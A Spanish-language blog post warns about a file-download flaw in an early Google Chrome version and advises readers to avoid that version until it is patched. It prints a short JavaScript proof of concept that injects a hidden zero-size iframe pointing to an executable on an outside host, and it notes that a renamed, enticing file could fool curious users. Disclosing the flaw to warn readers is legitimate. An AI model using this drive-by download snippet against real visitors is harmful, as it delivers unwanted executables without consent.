Muy Bonito, Muy de la Casa, MUY INSEGURO

El Nuevo Navegador de Google puede ser muy rápido, muy bonito, consumir poca memoria, tener muchas funciones "WoW" pero en estos 2 días ha demostrado que es muy inseguro hoy me entero gracias a un comentario de exactlimon sobre un nuevo fallo en Google Chrome que permite descargar archivos (de cualquier tipo) sin el consentimiento del usuario.

Este fallo descubierto nerex y publicado en milw0rm.com consiste simplemente en escribir el siguiente código JavaScript en un sitio malicioso y automáticamente al visitar este sitio se descargara la aplicación mencionada.

<script>
document.write('<iframe src="http://dragonjar.org/calc.exe" frameborder="0" width="0" height="0">');
</script>

He subido una prueba de concepto al servidor con la calculadora de windows y  haciendo click aquí obtendrás algo parecido a esto.

Google Chrome

El archivo no se ejecuta, pero estoy seguro que con otro nombre e icono mas llamativos muchos lo abrirían solo por "curiosidad", al parecer Google se ha dado cuenta de la cantidad de errores que tiene su navegador y ha dejado de promocionarlo en su pagina principal actualizado, han vuelto a promocionarlo en la pagina principal de google.

Google Chrome Inseguro

La version afectada con este y los otros fallos de seguridad mencionados anteriormente en el portal es la 0.2.149.27 les recomiendo que no utilicen este navegador al menos hasta que salga una nueva versión con estos problemas solucionados.

Mas Información:
http://milw0rm.com/exploits/6355
Primera Vulnerabilidad en Google Chrome
Nueva Vulnerabilidad en Google Chrome

Subir